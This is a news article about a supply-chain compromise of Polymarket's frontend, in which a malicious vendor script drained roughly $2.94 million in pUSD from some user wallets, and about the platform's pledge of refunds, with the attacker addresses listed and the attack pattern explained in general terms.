Polymarket To Refund Users After Vendor Script Drains $2.94M

Polymarket has contained a third-party vendor compromise after a malicious script was injected into its frontend for some users. The affected dependency has been removed, and impacted users are being contacted for full refunds.

The confirmation links the earlier pUSD wallet drains to a frontend supply-chain incident rather than a confirmed Polymarket smart-contract exploit. The active failure point was the compromised vendor dependency that reached some users through the platform interface.

The affected users appear to match the earlier onchain alert tied to an estimated $2.94 million drain from 11 or more wallets holding pUSD. The attacker swapped stolen assets into ETH and consolidated funds through 0xe65b1C586757c5510B60F998Eebb14C1eF71E1eD.

pUSD Drains Moved Into ETH

The stolen funds came from wallets holding pUSD, Polymarket’s dollar-denominated trading collateral on Polygon. Earlier onchain tracking identified four additional theft addresses: 0xC771A30a7c1aCA828eeEF7B822ac864a64cBaAe2, 0xC44F2Ca6B30A54d17a62ceF8FAdaF2e8C8632eC4, 0x10366AdBB5C4101A65C840Da6639546179C5A107 and 0x7BCECe0d8fd92ECCf39Bc35242c6D9aAc0aA75A6.

The attack path fits a malicious frontend pattern. A user can land on a legitimate site, see a familiar interface and still be exposed if a compromised dependency injects wallet-draining logic into the session. The chain and core market contracts do not need to fail for users to lose funds through approvals, signatures or transaction prompts served through the frontend.

That makes Polymarket’s refund commitment the central user update. Affected users are now being contacted directly, while the compromised dependency has been removed from the frontend stack.

Frontend Risk Hits A Growing Prediction Market

The incident lands as Polymarket is pushing into more distribution channels and consumer-facing trading flows. A recent Polymarket-powered launch brought prediction markets into TON through Telegram-native wallets, widening access beyond the core web interface and exposing the product to more wallet environments.

The platform has also faced broader pressure around growth, promotion and user acquisition. One recent report tied Polymarket’s chief marketing officer to more than $2.5 million in PayPal transfers for creator campaigns, raising disclosure questions around paid promotion in prediction markets. Another report accused Polymarket-linked marketing of using fake-win videos to attract U.S. users, adding scrutiny around how offshore prediction-market products are promoted to restricted audiences.

The latest issue is different because it centers on user-wallet safety, frontend integrity and vendor security. A compromised dependency can place malicious wallet logic in front of users even when the interface looks familiar, which makes third-party scripts, dependency controls and emergency rollback systems part of the security perimeter for trading apps.